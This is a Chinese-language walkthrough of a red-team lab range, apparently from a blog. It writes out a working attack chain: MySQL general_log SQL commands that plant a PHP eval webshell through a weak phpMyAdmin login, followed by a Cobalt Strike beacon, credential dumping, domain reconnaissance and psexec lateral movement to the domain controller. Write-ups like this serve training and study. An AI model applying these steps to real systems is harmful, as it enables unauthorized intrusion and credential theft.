一:靶场环境搭建
在线靶场链接如下:
1.Win7 虚拟机相当于网关服务器,所以需要两张网卡,故需要配置两个网络适配器(网卡),点击添加网络设配器,将 Win7 的网络适配器 1 设置成自定义( VMnet1 仅主机模式),网络适配器 2 设置成 NAT 模式:
2.Win2003、Win2008 网络适配器设置成自定义(VMnet1仅主机模式)即可:
3.至此网络配置完成,现在可以登进去每个服务器看一看,是不是成功获取了IP,这三台虚拟主机默认开机密码都是 hongrisec@2019。实际上域环境三台虚拟机的 IP 初始状态就已经被配置为固定的 192.168.52.XXX/24网段(同时已配置好域控 IP 必定为 192.168.52.138),故 VMware 仅主机模式的 VMnet1 网卡应注意也配置为 192.168.52.XXX/24 网段:
4.环境搭建的最后,在 Win7 外网服务器主机的 C 盘找到 PhpStudy 启动 Web 服务(模拟外网 Web 站点):
5.使用物理机可正常访问 Win7 服务器的站点:
二:外网边界突破
MySQL写日志Getshell
1.在物理机访问目标单位的外网站点,发现一个 MySQL 连接检测:
输入账号 root 密码 root 进行连接检测,发现连接成功:
2.使用 dirsearch 扫描下 Web 路径,发现有 phpmyadmin 路径
3.访问 phpmyadmin
4.发现存在弱口令 root/root,可成功登录后台:
5.通过 MySQL 日志导入木马。查看日志状态,执行命令:show variables like '%general%';
6.当开启 general_log 时,所执行的 SQL 语句都会出现在 stu1.log 文件中。那么如果修改 general_log_file 的值,则所执行的 SQL 语句就会对应生成对应的文件中,进而可 Getshell。故执行命令:SET GLOBAL general_log='on';
7.指定日志写入到网站根目录的shw.php 文件,执行命令:
SET GLOBAL general_log_file='C:/phpStudy/www/shw.php';
8.将一句话木马写入 shw.php 文件中。执行 SQL 语句:
SELECT '<?php eval($_POST["cmd"]);?>';
9.访问日志文件(已写入一句话木马):http://192.168.52.143/shw.php
直接上哥斯拉Getshell
10.权限判断,查看IP
通过查看用户权限发现是administrator权限
通过查看ip时发现服务器存在双网卡,可知内网IP段为192.168.52.X
三:内网信息探测
靶机CS 后门上线
1.公网运行cs服务:
2.运行CS客户端并连接公网VPS的CS服务端,然后生成 exe 可执行后门程序:
3.利用哥斯拉将生成的 exe后门文件上传到靶机
4.接着在哥斯拉中使用终端命令行执行beacon.exe,随后CS客户端可以看到靶机上线
域内信息收集
1.机器上线后,修改sleep值,同时查看一下权限:
2.这里发现权限是GOD/Administrator,这里就有一个很关键的地方,根据之前webshell中查看的ip信息,发现是存在双网卡的,这里可以判断是存在域的,所以这里先来抓取密码。
点击视图下的密码凭据可以直观的查看抓取结果
3,进行域内信息收集:
命令:shell net config Workstation
//当前计算机名,全名,用户名,系统版本,工作站域,登陆域
命令:shell net view
//查看局域网内其他主机名
4.端口扫描52段
5.通过扫描发现果然存在其他主机IP,发现192.168.52.138、192.168.52.141两个其他IP,查看一下视图中的目标:
四:内网横向渗透
创建隧道
横向移动
1.针对192.168.52.138和192.168.52.141进行横向移动,在目标中选取右键横向移动->psexec:
2.192.168.52.138成功上线,这里使用命令来查看信息:
命令:shell whoami
命令:shell ipconfig
命令:shell systeminfo
3.使用同样的方法攻击192.168.52.141:
4.192.168.52.141成功上线,这里使用命令来查看信息:
命令:shell whoami
命令:shell ipconfig
命令:shell systeminfo
5.这里已经拿下了域内的剩下2台机器,其中一台还是域控机器,这里就查看拓扑图:
扫一扫
586
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
